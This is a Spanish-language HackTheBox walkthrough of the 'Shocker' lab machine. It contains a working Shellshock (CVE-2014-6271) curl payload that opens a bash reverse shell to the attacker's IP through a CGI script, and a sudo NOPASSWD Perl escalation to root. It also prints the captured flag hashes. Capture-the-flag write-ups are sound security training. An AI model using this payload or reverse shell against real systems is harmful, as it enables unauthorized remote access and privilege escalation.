HackTheBox Easy Linux Shellshock CGI CVE-2014-6271 Sudo

Shocker

Shellshock en script CGI permite RCE directo; escalada con sudo NOPASSWD sobre Perl.

cat4clysm

nmap wfuzz curl netcat

root@kali:~$

nmap -sC -sV -p80,2222 10.10.10.56 -Pn -n -oN targeted

root@kali:~$

wfuzz -c --hc 404 -t 100 -w /usr/share/dirb/wordlists/common.txt http://10.10.10.56/FUZZ
# Encontramos cgi-bin/

root@kali:~$

wfuzz -c --hc 404 -t 100 -w /usr/share/dirb/wordlists/common.txt -w extensions.txt http://10.10.10.56/cgi-bin/FUZZ.FUZ2Z

root@kali:~$

curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'" http://10.10.10.56/cgi-bin/user.sh
sudo nc -lvp 443

cat /home/shelly/user.txt
# 2ec24e11320026d1e70ff3e16695b233

root@kali:~$

sudo -l
# (root) NOPASSWD: /usr/bin/perl

sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami -> root
cat /root/root.txt
# 52c2715605d70c7619030560dc1ca467

Shellshock (CVE-2014-6271) en scripts CGI permite RCE sin autenticacion via header HTTP.
Siempre fuzzear cgi-bin/ con extensiones sh, cgi, pl para encontrar scripts vulnerables.
Perl con sudo NOPASSWD es una escalada trivial segun GTFOBins.